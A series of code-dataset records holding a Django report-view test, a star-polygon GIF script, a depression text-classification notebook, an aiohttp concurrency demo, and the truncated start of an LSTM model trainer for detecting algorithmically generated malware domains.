0)\n\n # test station percentage processed\n data = {'data': '{\"percentage_processed\": \"10\"}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n", "sub_path": "tally_ho/apps/tally/tests/views/reports/test_administrative_areas_reports.py", "file_name": "test_administrative_areas_reports.py", "file_ext": "py", "file_size_in_byte": 9528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tally_ho.libs.tests.test_base.TestBase", "line_number": 26, "usage_type": "name"}, {"api_name": "django.test.RequestFactory", "line_number": 28, "usage_type": "call"}, {"api_name": "tally_ho.libs.permissions.groups.TALLY_MANAGER", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.permissions.groups", "line_number": 31, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_tally", "line_number": 32, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_electrol_race", "line_number": 34, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.fixtures.electrol_race_data.electrol_races", "line_number": 36, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_ballot", "line_number": 38, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_region", "line_number": 39, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_office", "line_number": 40, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_constituency", "line_number": 41, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_sub_constituency", "line_number": 43, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.center.Center.objects.get_or_create", "line_number": 44, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.center.Center.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.models.center.Center", "line_number": 44, "usage_type": "name"}, {"api_name": "tally_ho.libs.models.enums.center_type.CenterType.GENERAL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.center_type.CenterType", "line_number": 54, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_station", "line_number": 57, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_result_form", "line_number": 60, "usage_type": "call"}, {"api_name": "tally_ho.libs.models.enums.form_state.FormState.ARCHIVED", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.form_state.FormState", "line_number": 62, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_reconciliation_form", "line_number": 67, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_candidates", "line_number": 80, "usage_type": "call"}, {"api_name": "tally_ho.libs.models.enums.entry_version.EntryVersion.FINAL", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.entry_version.EntryVersion", "line_number": 85, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_result", "line_number": 88, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.SummaryReportDataView.as_view", "line_number": 96, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.SummaryReportDataView", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 96, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 108, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ProgressiveReportDataView.as_view", "line_number": 126, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ProgressiveReportDataView", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 126, "usage_type": "name"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate.objects.filter", "line_number": 134, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate", "line_number": 134, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 139, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ResultFormResultsListDataView.as_view", "line_number": 154, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ResultFormResultsListDataView", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 154, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 180, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 191, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 197, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 202, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 208, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 213, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 219, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 223, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 229, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 233, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 239, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 243, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 249, "usage_type": "call"}]} +{"seq_id": "261314306", "text": "\"\"\"\nDylan Copley\nMAE 5020\nHomework 1\nProblem 2\n\nSame polygon gen thing except it makes stars... Was showing off to a friend.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport imageio\nimport os\n\n\n#function that plots the polygon, then returns the decoded rgb and image property info\ndef polygon_anim(s):\n # defining angles\n angles = [(360 / (2 * s)) * n for n in range(0, 2 * s)]\n\n # defining points from angles, list comprehension except each value is a list itself. index 0 and 1 are x and y.\n points = [[np.cos(n * (np.pi / 180)), np.sin(n * (np.pi / 180))] for n in angles]\n\n # simply appending the last point as the initial point. This way when lines are needed to be drawn the last points\n # and the initial point will have its line drawn.\n points.append(points[0])\n\n #generated twice the number of angles/vertices. Every other vertice has half the radial length, creating star shape\n for n in range(0, len(points) - 1):\n #modulus operator to test if divisible by 2, same as saying \"every other\", or \"every even\"\n if n % 2 == 1:\n points[n][0] = points[n][0] / 2\n points[n][1] = points[n][1] / 2\n\n #defining a subplot to play around with draw modes\n fig, ax = plt.subplots()\n\n #for each point,\n for n in range(0,len(points)-1):\n #bit tricky to read,\n #plt.plot([x1,x2],[y1,y2],'red line solid dot points')\n #points[n][0] are x value, points[n][1] are y value.\n #have to do a ax subplot plot to send current frame\n ax.plot([points[n][0],points[n+1][0]],[points[n][1],points[n+1][1]],'ro-')\n\n\n #pretifying\n ax.set_title(\"Number of sides: \" + str(s))\n ax.grid(True)\n ax.set_xlim([-2,2])\n #took an image of plot window, discovered that the scaling ratio of x to y was about 1.343\n #this makes the x and y scales the same, and a prettier image.\n ax.set_ylim([-2/1.343,2/1.343])\n #showing origin\n ax.plot([0],[0],'bo')\n\n #maximize and grab current frame. I have no clue how I got this code, I borrowed it from an old program.\n fig.canvas.draw()\n image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')\n image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n #return frame generated\n return image\n\n#getting root directory, need to save the gif file somewhere\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n#very scary function\n#imageio.mimsave((PATH),[list comprehension with each value being a current frame image],fps=n)\n#create a gif file stored in the root directory of the program.\n#list comprehension generating 27 polygons from 3 to 14. defined fps as 4.\n#image is saved as animated_polygon.gif. file will overwrite if program ran again\n\nimageio.mimsave((ROOT_DIR + \"\\\\animated_star.gif\"),[polygon_anim(s) for s in range(4,12)], fps=4)", "sub_path": "test_files/star_generator.py", "file_name": "star_generator.py", "file_ext": "py", "file_size_in_byte": 2836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.cos", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.frombuffer", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "imageio.mimsave", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "273872550", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport re\nimport pandas as pd\nimport numpy as np\n\n\n# In[2]:\n\n\nfh=open('isear.txt')\nlabel=[]\nsen=[]\nfor line in fh:\n lis=re.findall('[a-zA-Z]+',line)\n label.append(lis[0])\n sen.append(' '.join(lis[1:]))\n \n\n\n# In[3]:\n\n\nprint(label)\n\n\n# In[4]:\n\n\nprint(sen)\n\n\n# In[5]:\n\n\nimport csv\n\n\n# In[6]:\n\n\nwith open ('data2.csv','w') as f:\n writer=csv.writer(f)\n writer.writerows(zip(label,sen))\n\n\n# In[7]:\n\n\ndf=pd.read_csv('data2.csv')\n\n\n# In[8]:\n\n\ndf.head()\n\n\n# In[9]:\n\n\ndf.rename(columns={'ID':'label','CITY COUN SUBJ SEX AGE RELI PRAC FOCC MOCC FIEL EMOT WHEN LONG INTS ERGO TROPHO TEMPER EXPRES MOVE EXP EXP EXP PARAL CON EXPC PLEA PLAN FAIR CAUS COPING MORL SELF RELA VERBAL NEUTRO Field Field Field MYKEY SIT STATE':'sentence'},inplace=True)\n\n\n# In[ ]:\n\n\n\n\n\n# In[10]:\n\n\ndf.head()\n\n\n# In[11]:\n\n\ndf.isnull().sum()\n\n\n# In[ ]:\n\n\n\n\n\n# In[12]:\n\n\n'''\nNot using NLTK as Spacy is more faster and accurate in Lemmatization and removing stop words.\ncorpus=[]\nfor i in range(7666):\n sentence=re.sub('[^a-zA-Z]', ' ',df['sentence'][i])\n sentence=sentence.lower()\n setence=sentence.split()\n ws=WordLemmatizer()\n sentence=[ws.lemmatize(s) for s in sentence if not s in stopwords.words('english')]\n sentence=' '.join(sentence)\n corpus.append(sentence)'''\n\n\n# In[13]:\n\n\n\nimport spacy\nnlp=spacy.load('en_core_web_sm')\n\n\n# In[14]:\n\n\nprint(nlp.Defaults.stop_words)\n\n\n# In[ ]:\n\n\n\n\n\n# In[15]:\n\n\n# Removing stop words\ncorpus=[]\nfor i in range(7666):\n sentence=re.sub('[^a-zA-Z]', ' ',df['sentence'][i])\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n corpus.append(sentence)\n\n\n# In[16]:\n\n\ncorpus\n\n\n# In[17]:\n\n\n#Lemmatization\ncorpus2=[]\nfor i in range(7666):\n sent=nlp(corpus[i])\n \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n corpus2.append(sentence2)\n\n\n# In[18]:\n\n\ncorpus2\n\n\n# In[19]:\n\n\ndf.head()\n\n\n# In[20]:\n\n\ndf['cleaned_sentence']=corpus2\n\n\n# In[21]:\n\n\ndf.head()\n\n\n# In[22]:\n\n\ndf.label.value_counts()\n\n\n# In[23]:\n\n\n#WordCloud Analysis\n\n\n# In[24]:\n\n\nget_ipython().system('pip install wordcloud')\nfrom wordcloud import WordCloud\nimport matplotlib.cm\nimport matplotlib.pyplot as plt\n\n\n# In[25]:\n\n\ndepressive_words = ' '.join(list(df[df['label'] == 'sadness']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=matplotlib.cm.inferno).generate(depressive_words)\nplt.figure(figsize = (8, 6), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n\n# In[26]:\n\n\ndepressive_words = ' '.join(list(df[df['label'] == 'joy']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=matplotlib.cm.inferno).generate(depressive_words)\nplt.figure(figsize = (8, 6), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n\n# In[27]:\n\n\ndf['emotion'] = df['label'].apply(lambda c: 'Positive' if c =='sadness' else 'Negative')\n\n\n# In[28]:\n\n\ndf['emotion'].value_counts()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[29]:\n\n\ndf5=pd.read_csv('sentiment_tweets3.csv')\n\n\n# In[30]:\n\n\ndf5.head()\n\n\n# In[31]:\n\n\ndf5 = df5.drop(['Unnamed: 0'],axis=1)\n\n\n# In[32]:\n\n\ndf5.label.value_counts()\n\n\n# In[33]:\n\n\ndf5\n\n\n# In[34]:\n\n\ndf5=df5.iloc[6000:]\n\n\n# In[35]:\n\n\ndf5.info()\n\n\n# In[36]:\n\n\ncorpus=[]\nfor i in range(6000,10314):\n sentence=re.sub('[^a-zA-Z]', ' ',df5['message'][i])\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n corpus.append(sentence)\n\n\n# In[37]:\n\n\ncorpus2=[]\nfor i in corpus:\n sent=nlp(i) \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n corpus2.append(sentence2)\n\n\n# In[38]:\n\n\nlen(corpus2)\n\n\n# In[39]:\n\n\ndf5['cleaned_sentence']=corpus2\n\n\n# In[40]:\n\n\ndf5=df5[['label','message','cleaned_sentence']]\n\n\n# In[41]:\n\n\ndf5.head()\n\n\n# In[42]:\n\n\ndf.head()\n\n\n# In[43]:\n\n\ndf5.rename(columns={'message':'sentence'},inplace=True)\n\n\n# In[44]:\n\n\ndf3=df5[df5['label']>=0]\n\n\n# In[45]:\n\n\ndf3.info()\n\n\n# In[46]:\n\n\ndf.info()\n\n\n# In[47]:\n\n\ndf4=df.append(df3)\n\n\n# In[48]:\n\n\ndf4.head()\n\n\n# In[49]:\n\n\ndf4['emotion'] = df4['label'].apply(lambda c: 'Positive' if c !=0 and c!='joy' else 'Negative')\n\n\n# In[50]:\n\n\ndf4.info()\n\n\n# In[51]:\n\n\ndf4['emotion'].value_counts()\n\n\n# In[52]:\n\n\ndf4.info()\n\n\n# In[53]:\n\n\ndf4.to_csv('cleaned_data.csv')\n\n\n# In[54]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n\nX = df4['cleaned_sentence']\ny = df4['emotion']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=42)\n\n\n# In[55]:\n\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import LinearSVC\n\ntext_clf = Pipeline([('tfidf', TfidfVectorizer()),\n ('clf', LinearSVC()),\n])\n\n# Feed the training data through the pipeline\ntext_clf.fit(X_train, y_train) \n\n\n# In[56]:\n\n\ndef process(str):\n corpus=[]\n \n sentence=re.sub('[^a-zA-Z]', ' ',str)\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n \n \n \n sent=nlp(sentence) \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n return(sentence2)\n\n\n# In[57]:\n\n\nstring=str(input(\"Enter Message :\"))\nstring2=process(string) \nz=pd.Series(string2)\npredictions = text_clf.predict(z)\npredictions\n\n\n# In[58]:\n\n\npredictions2=text_clf.predict(X_test)\nfrom sklearn import metrics\nprint(metrics.confusion_matrix(y_test,predictions2))\n\n\n# In[59]:\n\n\nprint(metrics.classification_report(y_test,predictions2))\n\n\n# \n\n# In[60]:\n\n\nprint(metrics.accuracy_score(y_test,predictions2))\n\n\n# In[62]:\n\n\ndepressive_words = ' '.join(list(df4[df4['emotion'] == 'Negative']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=\"Set1\").generate(depressive_words)\nplt.figure(figsize = (10,8), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n", "sub_path": "DepressionAnalysis.py", "file_name": "DepressionAnalysis.py", "file_ext": "py", "file_size_in_byte": 6208, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "spacy.load", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 135, "usage_type": "call"}, {"api_name": "wordcloud.WordCloud", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.cm.cm", "line_number": 212, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.cm.cm", "line_number": 224, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 265, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 309, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 435, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 445, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 445, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 446, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 459, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 479, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 489, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 489, "usage_type": "name"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 495, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 495, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 503, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 503, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 514, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 515, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 515, "usage_type": "name"}]} +{"seq_id": "168121368", "text": "import asyncio\nimport aiohttp\n\nasync def download(visits, site):\n count = 0\n for _ in range(visits):\n print(f\"downloading {site}\")\n async with aiohttp.ClientSession() as session:\n async with session.get(site) as response:\n html = await response.text()\n count += len(html)\n message = f\"{site} returned {count//1000}K characters\"\n return message\n\nasync def main():\n # note each download yields immediately so that other downloads \n # can run in parallel. main waits until all results are available\n response = await asyncio.gather(\n download(15, \"http://ibm.com\"),\n download(20, \"http://bbc.co.uk\"),\n download(25, \"http://abc.com\")\n )\n print(response)\n \nasyncio.run(main())\n\n", "sub_path": "src/17 Threading and Concurrency/AsyncIO/07.futures.py", "file_name": "07.futures.py", "file_ext": "py", "file_size_in_byte": 780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 8, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 18, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "245138893", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Libraries\nimport os\nimport argparse\nimport sys\nimport time\nimport json\nimport re\nimport numpy as np\nimport pandas as pd\nimport statistics as stat\nimport lstm_binary\nimport lstm_multiclass\nfrom pprint import pprint\nfrom datetime import datetime\nfrom shutil import copy2\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\n# constants\nmodels_path = '../data/local/models/'\ndata_path = '../data/local/staging/'\n\nREFPATH = \"./\"\nPROJECT_ROOT = \"/Users/nscsekhar/Desktop/nscsekhar/Desktop/Surya/Personal/MIDS/W210/Project/team_cyber/\"\nMULTI_TOKENIZER_FILE = PROJECT_ROOT + \"saved_models/multiclass_tokenizer.pkl\"\nMULTI_CATEGORIES_FILE = PROJECT_ROOT + \"saved_models/multiclass_categories.pkl\"\nMULTI_MODEL_JSON = PROJECT_ROOT + \"saved_models/multiclass_LSTM.json\"\nMULTI_MODEL_H5 = PROJECT_ROOT + \"saved_models/multiclass_LSTM.h5\"\n\n\ndef valid_filename(filename, path=''):\n '''valid_filename: determines if the given filename is a real file. Assumes that the file is in the current working directory for the program.\n\n returns: given file name\n '''\n if path == '':\n path = os.getcwd()+'/'\n\n if not os.path.isfile(path+filename):\n msg = \"The given file '{}' does not exist at '{}'.\".format(\n filename,\n path\n )\n raise argparse.ArgumentTypeError(msg)\n\n return filename\n\n\ndef parse_args():\n '''parse_args: parse command line arguments\n\n return: dictionary of arguments\n '''\n parser = argparse.ArgumentParser(\n description='Runs models either in train or inference mode.',\n prog='models',\n epilog='Models requires at least one of -t/--train or -i/--inference to operate correctly. Both may be provided for sequential analysis.')\n parser.add_argument('config_file',\n type=valid_filename,\n metavar='CONFIG_FILE',\n help=\"File path to the requex configuration file. File must be in JSON format.\")\n parser.add_argument('-t', '--train',\n metavar='TRAINING_FILE',\n nargs=1,\n help=\"Runs models in training mode. Training will be run on the given file. The training file must be a prepared '.csv' file. The program will search for the file in the models, then staging, and finally downloads directories.\")\n parser.add_argument('-i', '--inference',\n metavar='INFERENCE_FILE',\n nargs=1,\n help=\"Runs models in inference mode. Inference will be run on the given file. The inference file must be a list of domains separated by carriage returns with no header. The program will search for the file in the models, then staging, and finally downloads directories.\")\n parser.add_argument('-m', '--model', choices=['binary', 'multiclass'],\n metavar='model_type',\n required=True,\n help=\"This required option indicates which type of model is being built or used. Using 'binary' selects a benign/malicious model. Using 'multiclass' will classify the malware family for each malicious classified entry.\")\n\n return vars(parser.parse_args())\n\n\ndef get_config_filename(filename=None):\n '''get_config_filename: returns a verified Requex configuration file name. This function handles the ambiguity around whether the module was called from a shell with command line arguments or if called from another program using the run() function. If filename is none, the function assumes that there are\n\n return: string; valid filename.\n '''\n if filename is None:\n # get command line arguments\n args = parse_args()\n filename = args['config_file']\n else:\n # filename provided, verify the file exists\n if not os.path.isfile(filename):\n print(\"The given file '{}' does not exist at '{}'.\".format(\n filename,\n os.getcwd()\n ))\n exit(1)\n return filename\n\n\ndef get_config(filename):\n '''get_config: reads the configuration JSON file and stores values in a dictionary for processing.\n\n PRE: assumes the file already exists\n\n return: dict of configuration settings\n '''\n\n with open(filename, \"r\") as f:\n config = json.load(f)\n\n return config\n\n\ndef get_file_date(filename):\n '''get_file_date: extracts file date from file name. File date must be in YYYY-MM-DD format.\n\n returns: datetime object of file date.\n '''\n date = re.search(r'\\d\\d\\d\\d-\\d\\d-\\d\\d|$', filename).group()\n year, month, day = date.split('-')\n return datetime(int(year), int(month), int(day))\n\n\ndef write_to_train_logfile(metrics, logpath, stdout=True):\n '''write_to_train_logfile: writes metadata in the metrics dict to a logfile\n '''\n # constants\n logfile = 'requex_training_log.csv'\n\n # write to logfile\n stamp = datetime.utcnow().strftime('%Y-%m-%d-%H:%M')\n\n # extract the filename\n # filename = os.path.basename(datafile)\n\n if stdout:\n # print(\"info:{:>10} rows: {:>10} malicious, {:>10} benign, a {:>3.3f} ratio\".format(total_rows, malicious_rows, benign_rows, ratio))\n print('info: {}, {}, {}, {:>3.3f}s, {:>3.2f} MB, {} rows: {} malicious, {} benign, {:>3.3f} ratio, {}, {} categories, train rows: {}, test rows: {}, train time: {:>3.3f}s, inference time: {:>3.3f}s'.format(\n stamp, metrics['filename'], metrics['filedate'], metrics['time'], metrics['memory'], metrics['total_rows'], metrics['malicious_rows'], metrics['benign_rows'], metrics['ratio'], metrics['model'], metrics['categories'], metrics['train_rows'], metrics['test_rows'], metrics['train_time'], metrics['inference_time']))\n\n with open(logpath+logfile, 'at') as log:\n log.write('{}, {}, {}, {:>3.3f}, {:>3.2f}, {}, {}, {}, {:>3.3f}, {}, {}, {}, {}, {:>3.3f}, {:>3.3f}\\n'.format(\n stamp, metrics['filename'], metrics['filedate'], metrics['time'], metrics['memory'], metrics['total_rows'], metrics['malicious_rows'], metrics['benign_rows'], metrics['ratio'], metrics['model'], metrics['categories'], metrics['train_rows'], metrics['test_rows'], metrics['train_time'], metrics['inference_time']))\n\n\ndef copy_models(src, dst):\n '''copy_models: copies the source file (src) to the dst directory. src must be a file and dst must be a directory. Exclusions is an optional parameter that allows for files with certain file names to be excluded from being moved.\n '''\n # check to see if a directory for the dst directory exists\n if not os.path.isdir(dst):\n # directory does not exist, create it\n os.mkdir(dst)\n\n # verify whether the source and destination are the same\n src_path, filename = os.path.split(src)\n if os.path.isfile(dst+filename):\n print(\"A file by the name '{}' already exists. File not copied. Processing will continue using the file already in the '{}' directory.\".format(filename, dst))\n elif os.path.isfile(src):\n copy2(src, dst)\n else:\n print(\"The given file '{}' does not exist.\".format(src))\n exit(1)\n\n\ndef get_training_data(filename, metrics, logpath):\n '''get_training_data: reads the csv file into a pandas dataframe\n\n return: pandas dataframe\n '''\n # constants\n MB = 1024*1024\n\n start_time = time.time()\n df = pd.read_csv(filename,\n sep=',',\n parse_dates=[0],\n dtype={1: int, 2: str, 3: str},\n engine='c')\n end_time = time.time()\n read_time = end_time - start_time\n\n # calculate the memory footprint of the dataframe\n memory = sys.getsizeof(df)/MB\n\n filedate = get_file_date(filename)\n total = df.shape[0]\n benign = df.loc[df['dga'] == 0].shape[0]\n malicious = df.loc[df['dga'] == 1].shape[0]\n ratio = malicious / benign\n\n # write to logfile\n # write_to_train_logfile(logpath, filename, filedate.strftime('%Y-%m-%d'), read_time, memory, total, malicious, '2',benign, ratio)\n metrics = {\n 'filename': filename,\n 'filedate': filedate.strftime('%Y-%m-%d'),\n 'time': read_time,\n 'memory': memory,\n 'total_rows': total,\n 'malicious_rows': malicious,\n 'benign_rows': benign,\n 'ratio': ratio,\n 'categories': 0,\n 'model': 'unknown',\n 'train_rows': 0,\n 'test_rows': 0,\n 'train_time': 0,\n 'inference_rows': 0,\n 'inference_time': 0,\n 'inference_time_mean': 0.0\n }\n\n return df, metrics\n\n\ndef prep_training_dataset_binary(df):\n '''prep_training_dataset_binary: creates X, Y datasets for training and testing.\n\n returns: pandas dataframe x4: X_train, X_test, Y_train, Y_test\n '''\n # create X, Y dataframes. X = 'domain' and the model will try to\n # predict Y the catengory index.\n X = df['domain']\n Y = df['dga']\n\n X_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=0.2, random_state=23)\n\n return X_train, X_test, Y_train, Y_test\n\n\ndef prep_training_dataset_multiclass(df, categories_file):\n '''prep_training_dataset_multiclass: creates X, Y datasets for training and testing.\n\n returns: pandas dataframe x4: X_train, X_test, Y_train, Y_test and the number of uniques\n '''\n\n # factorize the malware column\n df['catIndex'], uniques = pd.factorize(df['malware'], sort=True)\n\n # display factorized values\n # print('malware uniques: total - {}\\n{}'.format(len(uniques), uniques))\n # print('catIndex uniques: {}'.format(\n # pd.unique(df['catIndex'].sort_values())))\n\n # record the categories to disk\n with open(categories_file, 